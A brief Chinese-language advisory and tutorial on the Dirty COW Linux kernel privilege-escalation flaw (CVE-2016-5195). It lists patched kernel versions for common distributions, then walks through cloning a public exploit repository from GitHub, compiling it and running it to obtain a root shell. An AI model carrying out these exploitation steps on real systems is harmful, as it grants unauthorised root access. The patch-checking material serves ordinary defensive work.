脏牛Linux本地提权漏洞(CVE-2016-5195)

 

漏洞编号：CVE-2016-5195
漏洞名称：脏牛（Dirty COW）
漏洞危害：低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权
影响范围：Linux内核>=2.6.22（2007年发行）开始就受影响了，直到2016年10月18日才修复。

一、检查内核版本

通过uname -a 命令，查看内核版本：

主流发行版修复之后的内核版本，如果你的内核版本低于列表里的版本，表示还存在脏牛漏洞。

Centos7 /RHEL7    3.10.0-327.36.3.el7
Cetnos6/RHEL6     2.6.32-642.6.2.el6
Ubuntu 16.10         4.8.0-26.28
Ubuntu 16.04         4.4.0-45.66
Ubuntu 14.04         3.13.0-100.147
Debian 8                3.16.36-1+deb8u2
Debian 7                3.2.82-1

 

二、漏洞利用

1、exp下载

git clone https://github.com/gbonacini/CVE-2016-5195.git

2、编译，生成可执行文件

sudo apt-get install g++
make

3、执行成功，返回一个root权限的shell